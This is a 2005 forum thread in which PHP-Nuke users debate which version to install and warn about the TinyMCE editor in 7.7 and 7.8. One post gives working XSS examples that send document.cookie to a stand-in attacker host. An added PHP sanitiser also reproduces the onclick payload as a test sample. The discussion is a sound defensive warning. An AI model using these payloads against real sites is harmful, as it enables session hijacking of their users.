Dauthus
Worker
Joined: Oct 07, 2003
Posts: 211
Posted: Sat Jun 04, 2005 12:03 pm
Knowing what you know now, and taking into account all the security issues and features, what version of PHP-Nuke would you install if you had to do it all over again?
_________________ Vivere disce, cogita mori

CurtisH
Life Cycles Becoming CPU Cycles
Joined: Mar 15, 2004
Posts: 638
Location: West Branch, MI
Posted: Sat Jun 04, 2005 1:31 pm
Easy. 6.9
All of the things I need, and none of the stuff I don't want.
_________________ Those who dream by day are cognizant of many things which escape those who dream only by night. ~Poe

djmaze
Subject Matter Expert
Joined: May 15, 2004
Posts: 727
Location: http://tinyurl.com/5z8dmv
Posted: Sat Jun 04, 2005 7:05 pm
None of them all.
I would look into better systems if I started all over.

Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Sat Jun 04, 2005 7:38 pm

Dauthus
Posted: Sat Jun 04, 2005 7:45 pm
It looks like 7.5 won that one by a landslide. I noticed everyone was touting features. Most of my "features" come from the additional modules supplied by the nuke community. There are few of the "original" modules left in my version. Interesting.

CurtisH
Posted: Sat Jun 04, 2005 8:02 pm
Quote:
I noticed everyone was touting features. Most of my "features" come from the additional modules supplied by the nuke community.
Exactly! I agree with you completely, which is why the never-ending upgrade seems so ridiculous to me. Better security would be a reason for upgrading, but as we have seen, security doesn't really factor in on FB's march towards a higher version number.
If it weren't for Chatserv, Raven and Bob (and many others) there wouldn't be any security.
I myself am more of a phpBB type, but really enjoy the ability to use nuke directly with it. On my site the forums get the most attention, so they are my primary concern when it comes to upgrades for features; nuke, on the other hand... well, mine has all the features I want and need.

christianb
Worker
Joined: Nov 24, 2004
Posts: 131
Location: Batesville, AR
Posted: Thu Jun 16, 2005 10:42 am
Well, having installed 6.9, 7.0, 7.3, 7.5, 7.6, and 7.7 patched as either upgrades (minus 6.9) or full versions (at least once), I chose 7.7 - not because of features, but because when I got 7.7, I got 7.7 patched and it pretty well ran right out of the modified box. Aside from 2-3 little problems, this has been the least problematic for me over the rest of them. Of course, with the experience I have now with fixing most of my problems, they don't seem to bother me as much. I do agree about the "features" situation, and I really don't care about those features (one I disabled altogether, as seen in another post), but since 7.7 patched wasn't an option, I chose 7.7 (since mine is 7.7) - just patched.

64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
Posted: Thu Jun 16, 2005 10:56 am
First and foremost, if security is a concern, you should NOT EVEN CONSIDER versions 7.7 or 7.8.
The inclusion of the new "HTML Editor" feature creates a huge security issue that one cannot easily avoid.... In fact, an issue that can't be avoided at all, regardless of whether you are using "Patched" or not. Patched cannot address this particular issue.
There are also other issues relative to it being impossible to certify 7.7 or 7.8 as HTML compliant, as there is no validation function for the TinyMCE HTML Editor. Again, a huge issue.
Next, as for 7.5 being the most popular of the last poll, keep in mind, it was the latest version at the time. Today, feature-wise, 7.6 may beat it out; however, for performance and security given the latest patched revisions, 6.9 may still be the best (and this coming from someone that has never used 6.9, but is using all versions from 7.0 through 7.8).
_________________ Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance.

christianb
Posted: Thu Jun 16, 2005 3:27 pm
Guess I should've kept my mouth shut on this one.
I thought we could just voice our opinions on this.
Didn't know it would get such a reaction. Guess I'll keep my mouth shut then.

CurtisH
Posted: Thu Jun 16, 2005 5:26 pm
I think you may have taken that wrong. 64BitGuy is merely trying to give you a solid heads up about the awful state of the newer Nuke so that you don't put a lot of work into using it and then end up compromised by someone who is familiar with the exploits.
Keep that mouth open! Opinions are welcomed here!

benson
Worker
Joined: May 15, 2004
Posts: 119
Location: Germany
Posted: Thu Jun 16, 2005 11:04 pm
|
Hi,
I do not know enough about security, but I 'want to believe' ...
Now I'm back down on 7.6 and, besides the problem with the admin modules.php file (new modules are not shown anymore), it works fine.
Maybe version 8.0 will be a milestone?
_________________ Best regards, Norbert

64bitguy
Posted: Fri Jun 17, 2005 6:32 am

christianb
Posted: Fri Jun 17, 2005 7:32 am
CurtisHancock wrote:
I think you may have taken that wrong. 64BitGuy is merely trying to give you a solid heads up about the awful state of the newer Nuke so that you don't put a lot of work into using it and then end up compromised by someone who is familiar with the exploits.
Keep that mouth open! Opinions are welcomed here!
I read about what he wrote before I installed 7.7 and actually... had very few problems with it. For me, 7.7 required the least amount of work - as I stated before, I used the patched version, so that took a lot of the problems out for me.

64bitguy
Posted: Fri Jun 17, 2005 7:48 am
Well... Just to clarify. I wrote an extensive article about PHP-Nuke 7.7 (which also applies to Version 7.8) and in that article I strongly urge users NOT to implement that (....now "these") latest Version(s).
There are serious new problems that cannot easily be overcome and some, due to the nature of what they are, can't be overcome at all.
Just some of the reasons why NOT to use 7.7 or 7.8 are outlined in my article at:
http://www.ravenphpscripts.com/posts5400.html
I have since discovered OTHER serious reasons why NOT to use 7.7 or 7.8 in addition to those outlined there, which I thought was a strong enough case to explain both WHY these releases made it into the public, as well as why people should use neither version.
I do think (as Curtis explained) that everyone is entitled to their opinions; however, as someone deeply involved in repairs and evolution of the solution, I'm merely pointing out the facts about the vulnerabilities as well as inherent problems from using these two versions of Nuke, which are for the most part completely untested and extremely risky to use.
Just a heads up.
Steph

djmaze
Posted: Fri Jun 17, 2005 8:42 am
Let me explain one of the biggest security holes that occur with "wysiwyg" and why it's the biggest mistake to make it an "integrated feature".
There are many ways to Rome, and so it is for javascript.
With javascript you could read cookies and redirect people, so for example:
Code:
top.location="my.hacksite.com/fetch.php?cookie="+document.cookie

But you think php-nuke prevents javascript as you saw the "tags not allowed" error sometimes? WRONG !!!
Thanks to TinyMCE I can do this now:
Code:
<a href="bob.html"><img src="image.gif" onclick="top.location='my.hacksite.com/fetch.php?cookie='+document.cookie;"></a>

As an html noob you will approve the message and a security hole is born.
I don't think I have to go into further detail because the message is clear.
Also this is just one example, but there are many more ways.

64bitguy
Posted: Fri Jun 17, 2005 9:24 am
Hi DJ...
Yes, that is just one example of how to exploit the many holes in the WYSIWYG Editor, but there are other problems related to this function as well, including ZERO compliance validation, leaving even more serious security and display holes.
I have talked about this in about a dozen places here at raven's but have avoided giving an example.... well.. for the obvious reason that it is a major vulnerability and why should I help the script punks?
But since people won't listen, I'm not going to edit it out, I'm merely going to point out that this is JUST ONE WAY people can hack your domain if you are using Nuke 7.7 or Nuke 7.8. Again, having some kind of validation and filtering would prevent this issue, but no such function exists for TinyMCE. It was meant to be small and fast and thus, it is what it is. The LEAST the author (FB... but many of us have other names for him) could have done is put some protections and validation tools in Nuke, but noooooooo, he had to try to catch up with Mambo and have a WYSIWYG editor without thinking things through.
It's quite simply a very bad idea to use ANY version of Nuke beyond 7.6 and, as I have said in other threads, I'll say it one last time!
Don't say that you were not forewarned when (NOT IF!! WHEN) you get hacked and lose all of your work and data!
Steph

christianb
Posted: Fri Jun 17, 2005 12:17 pm
I agree with the flaws of 7.7, that is undeniable. However, the topic was "Knowing what you know now, and taking into account all the security issues and features, what version of PHP-Nuke would you install if you had to do it all over again?" - and I answered accordingly. I personally dislike the WYSIWYG Editor TinyMCE and have it disabled where appropriate. That is one feature I can do without. If I know how to completely disable it, I will.
64bitguy wrote:
Don't say that you were not forewarned when (NOT IF!! WHEN) you get hacked and lose all of your work and data!
Watch me get hacked now. This almost feels like a borderline threat. On another note, I've already had a few failed attempts before I got 7.7 (mainly DoS) and a few that installing Sentinel put a stop to, so that makes me feel that TinyMCE was not a factor before 7.7 - If someone is wanting to hack you, and they are determined, you will get hacked - that's a fact.

64bitguy
Posted: Fri Jun 17, 2005 12:32 pm
Well, I can only comment that if you aren't using the TinyMCE, why would you install 7.7 or 7.8 in the first place?
The TinyMCE editor is where the major security hole is. The warning about being hacked is directly attributable to the fact that neither the default Nuke HTML tag forbidden protections, nor NukeSentinel, can protect you against an exploit that is being opened like a garage door by the editor and the mainfile of Nuke itself.
Again, the only way to protect against this would be to interpret, validate and filter all incoming editor content, but as that is not being done, it is as if you didn't have any protection at all.
My comments were by no means a threat as I don't waste my time trying to attack anyone's site... I am here for just the opposite reason; however, you must understand that there are jerks out there who DO just that kind of thing. Having a gaping hole like this in security is an invitation to them and, like I said, it's a common sense kind of issue. Do you really want that kind of gaping security hole in your domain?
"Knowing what I know" I would have to say, "NO!". And thus, I have done what I can to alert others so that they may come to the same conclusion. Running Nuke 7.7 or Nuke 7.8 is an extremely bad idea! Period... End of discussion.
As for my production domain, I have tons of protection including NukeSentinel and a number of other security measures and thus hackers (try as they might, and they do every single day) have never successfully penetrated my domain.... If I were to use 7.7 or 7.8, I KNOW that I would simply be making their job extremely easy and there is just no logic in employing that kind of scenario.
In closing, this is nothing like a DDOS attack. This is a security HOLE in your software. We are really talking apples and oranges in that regard. Again, with some basic protection tools like NukeSentinel, you have much less to worry about, but as this function can bypass that security, if you have 7.7 or 7.8, you should feel extremely concerned about being totally exposed security-wise.
Hence, the warning!
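The fix 64bitguy says is missing ("interpret, validate and filter all incoming editor content"), applied to the onclick payload djmaze posted earlier in the thread. This is an added illustration written for this page; it is not code from PHP-Nuke, TinyMCE, NukeSentinel or any thread participant. It uses PHP's standard DOMDocument to parse submitted HTML, keeps only an allow-list of tags and attributes (the list itself is an assumption, as is the placeholder host attacker.invalid in the constructed sample), drops every event-handler attribute because none is allow-listed, and rejects non-http(s) URL schemes.

```php
<?php
// Added example, not PHP-Nuke or TinyMCE code: an allow-list filter for
// HTML submitted through a WYSIWYG editor. Anything not explicitly
// allowed is removed, which is what neutralises an onclick handler.

// Elements that may survive and the attributes each may keep (assumed list).
const ALLOWED_TAGS = [
    'a'   => ['href', 'title'],
    'img' => ['src', 'alt'],
    'p'   => [], 'b' => [], 'i' => [], 'br' => [],
    'ul'  => [], 'ol' => [], 'li' => [],
];

// Relative paths and http(s) URLs pass; javascript:, data:, vbscript:
// and every other scheme are rejected.
function safe_url(string $url): bool
{
    $url = trim($url);
    if (preg_match('/^([a-z][a-z0-9+.-]*):/i', $url, $m)) {
        return in_array(strtolower($m[1]), ['http', 'https'], true);
    }
    return true;
}

function clean_node(DOMNode $node): void
{
    // Walk a snapshot: removing children mutates the live NodeList.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if ($tag === 'script' || $tag === 'style') {
                $node->removeChild($child);          // drop code and its text
                continue;
            }
            if (!isset(ALLOWED_TAGS[$tag])) {
                // Unknown element: keep its visible text, drop the markup.
                $text = $node->ownerDocument->createTextNode($child->textContent);
                $node->replaceChild($text, $child);
                continue;
            }
            // on* handlers always fail this test: they are never allow-listed.
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                $name = strtolower($attr->name);
                $keep = in_array($name, ALLOWED_TAGS[$tag], true)
                    && !(in_array($name, ['href', 'src'], true) && !safe_url($attr->value));
                if (!$keep) {
                    $child->removeAttribute($attr->name);
                }
            }
            clean_node($child);
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child);              // comments, CDATA, PIs
        }
    }
}

function sanitize_html(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);                // tolerate sloppy markup
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>');
    libxml_clear_errors();
    $body = $doc->getElementsByTagName('body')->item(0);
    clean_node($body);
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample: the thread's onclick payload with a placeholder host,
// plus a javascript: link to show the URL-scheme check.
$submitted = '<a href="bob.html"><img src="image.gif" '
    . 'onclick="top.location=\'http://attacker.invalid/fetch.php?cookie=\'+document.cookie;"></a>'
    . '<a href="javascript:alert(document.cookie)">link</a>';
echo sanitize_html($submitted), PHP_EOL;
```

Run it with `php sanitize.php`: the image link survives without its onclick attribute and the second anchor loses its href. Two design points matter for a real deployment: the filter must run server-side on every submission (client-side editor settings can be bypassed with a hand-crafted POST), and libxml's HTML parser is not a browser's, so a maintained library such as HTML Purifier is the safer choice over a hand-rolled allow-list in production.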
christianb
Posted: Fri Jun 17, 2005 12:40 pm
If TinyMCE isn't being used, how would a hacker be able to use TinyMCE? (I am only generally speaking here - this is in no way a defensive question.)
Besides Sentinel (using 2.20) what other security software can I use on my site? (again, generally speaking)

64bitguy
Posted: Fri Jun 17, 2005 12:51 pm
Well, it goes back to the original issue. If you aren't using a WYSIWYG Editor with Nuke, there is no reason to run 7.7 or 7.8. Further, if you disabled that function in 7.7 or 7.8, you would also need to patch the code in 1000 places that changed accompanying code to accommodate using a WYSIWYG Editor in the first place... again, the reason why you would simply use 7.6, which is thoroughly fixed and patched (at the latest).
Finally, FB (in his infinite wisdom) re-introduced a huge number of old (and new) bugs in addition to the WYSIWYG editor problems in 7.7 and 7.8, so there are several hundred more reasons why nobody should use either version.
To answer your question directly, if you have disabled the editor function in 7.7 or 7.8 and have completely recoded all of your tables, you obviously are not exposed to the problem.
Besides NukeSentinel, there are a variety of security measures including other 3rd party monitoring tools, security code modifications as well as mainfile alterations that can increase security. A number of these things are in development now for public release; others are employed and unreleased by webmasters.
As I do Government consulting, some of my domains go as far as having a live "Sniffer" on the wire and employ special firewalls. Generally speaking, NukeSentinel and .htaccess rules are enough to protect you in a "Shared hosting" environment as the host will employ security tools at the server level. Some people though need more.

Dauthus
Posted: Fri Jun 17, 2005 9:19 pm
64bitguy wrote:
Next, as for 7.5 being the most popular of the last poll, keep in mind, it was the latest version at the time. Today, feature-wise, 7.6 may beat it out; however, for performance and security given the latest patched revisions, 6.9 may still be the best (and this coming from someone that has never used 6.9, but is using all versions from 7.0 through 7. .
Ok, I really, really hate to ask this, but which one would you use? You never did actually say.

64bitguy
Posted: Fri Jun 17, 2005 9:44 pm
Well, it's really a toss-up in my mind. I mean the performance advantages are hard to ignore regarding the 6.x platform.
In my mind, many of the things introduced since (in the 7.x platforms) have been totally useless (like a groups function that doesn't have groups functionality... A points system that doesn't really do anything....) and the list goes on and on.
I personally have upgraded from 7.0 (what I actually started with) to 7.1, to 7.4, to 7.5 and then to Platinum 7.6.
At every turn, I was forced to fix 1000 things all over again. In the case of Platinum, I ended up completely rewriting it for my domain (hence why I have 1 of 2 PHP-Nuke domains that I know of on the planet that are actually 100% W3C Compliant).
The bottom line?
I would say it really depends on what you THINK that you want for features. 6.5-6.9 would probably be the very fastest and the most flexible for adding on new modules like NSN Groups and other serious feature enhancements, where the "fluff" of 7.0 through 7.6 won't get in your way.
But again, I think it's all a matter of preference.
I think the three people most qualified to break it down would be Raven, Bob Marion and Chatserv... Maybe you can check out the other related thread or otherwise use the forums' "search" feature for their input.

christianb
Posted: Sat Jun 18, 2005 5:12 am
64bitguy wrote:
(hence why I have 1 of 2 PHP-Nuke domains that I know of on the planet that are actually 100% W3C Compliant).
I have actually thought about doing this myself - although I'm not as knowledgeable as most, I like fixing things and I do like making things work for the better.

VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
Posted: Sun Jun 19, 2005 3:07 am
Dauthus wrote:
Knowing what you know now, and taking into account all the security issues and features, what version of PHP-Nuke would you install...
I hate to be a gadfly, but I'm still running 6.5 Final, patched and mod'ed, of course. I've installed every version since 5.5, in subdomains, but the only upgrades I've actually used on my production site were 5.6, 6.0 and 6.5. All the rest were used for testing code.
As is common with probably everyone else in this thread, my site is attacked daily, but it hasn't been hacked since the beginning of the Iraq War, when my web host installed MySQL 4.X in the middle of the night without telling anyone, and the 'Persians' defaced my site. LoL! The only thing they deleted was General George S. Patton's Speech to the Third U.S. Army - no kidding! Why this bugged them enough to deface my site, only Allah knows...
http://www.lenon.com/article1.html
Having said that, if for some reason I HAD to switch to another version of PHP-Nuke tomorrow, it would be 7.6, for the reasons listed above...
_________________ .:: "The further in you go, the bigger it gets!" ::.

benson
Posted: Sun Jun 19, 2005 10:44 am
Hi,
7.6 with spaw as editor is great! It's simple to add this editor, so there is no need for running 7.7 for me anymore!
Thanks for your help!